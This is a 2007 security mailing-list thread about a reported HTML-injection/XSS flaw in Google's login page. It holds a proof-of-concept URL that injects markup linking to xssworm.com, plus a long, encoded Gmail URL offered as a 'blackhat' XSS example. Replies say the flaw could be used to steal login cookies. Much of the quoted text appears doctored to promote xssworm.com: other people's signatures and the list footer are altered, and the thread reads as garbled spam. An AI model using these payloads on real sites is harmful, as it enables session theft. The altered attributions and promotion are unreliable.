Yes, all XSS is very serious and not for making jokes. If pdp said that a hacker can steal data, the CSS on Google could be a very dangerous vulnerability.
Blackhat SEO XSS <http://www.xssworm.com:80/?index?blackhat=seo#extreme> hacker example:

http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@!&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@!&q=http://xssworm.com/&seo=blackhat<http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@%21&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@%21&q=http://xssworm.com/&seo=blackhat>

Please if you search XSS hacking also visit XSSWORM.COM here: http://xssworm.com we have updates with blackhat and whitehat video with XSS hacking tutorial by blackhat[2] Sunjester from litehackers.info

vaj

--
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher - xssworm.com
mailto:[EMAIL PROTECTED]
aim: XSS Cross Site
------
[2] http://xssworm.blogvis.com/9/xssworm/what-is-a-blackhat-hacker-and-where-are-black-hats-hacking/

On Nov 9, 2007 8:36 AM, pdp (architect) <[EMAIL PROTECTED]> wrote:

> well this XSS can lead to so much data being stolen that it is not even
> funny!
>
> On Nov 8, 2007 8:55 PM, Juergen Marester <[EMAIL PROTECTED]> wrote:
>
> > wow ! 0day !
> > damn, 0day, XSS ...
> >
> > On 11/8/07, silky <[EMAIL PROTECTED]> wrote:
> > >
> > > worked for me minutes after it was posted. seems fixed now.
> > >
> > > On 11/9/07, crazy frog crazy frog <[EMAIL PROTECTED]> wrote:
> > > > i tested xssworm on gmail latest version
> > > >
> > > > On Nov 8, 2007 7:04 AM, Scripter Hack <[EMAIL PROTECTED]> wrote:
> > > > > There is a html injection video in
> > > > > https://www.xssworm.com<https://www.google.com>.
> > > > > It is very critical, you can get the cookie to login into gmail or other
> > > > > service.
> > > > >
> > > > > POC:
> > > > >
> > > > > https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#
> > > > > "><h1><a%20href=//xssworm.com/>xssworm</a></h1>
> > > > >
> > > > > More:http://[EMAIL PROTECTED]/<http://xss2root.blogspot.com/>
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > >
> > > > --
> > > > why advertise on secgeeks?
> > > > http://[EMAIL PROTECTED]<http://secgeeks.com/Advertising_on_Secgeeks.com>
> > > > http://newskicks.com
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in xss.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia -
> > > > http://xssworm./secunia.com/<http://secunia.com/>
>
> --
> pdp (acronym) | petrol v. petco
> http://www.xssworm.com <http://www.gnucitizen.org>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
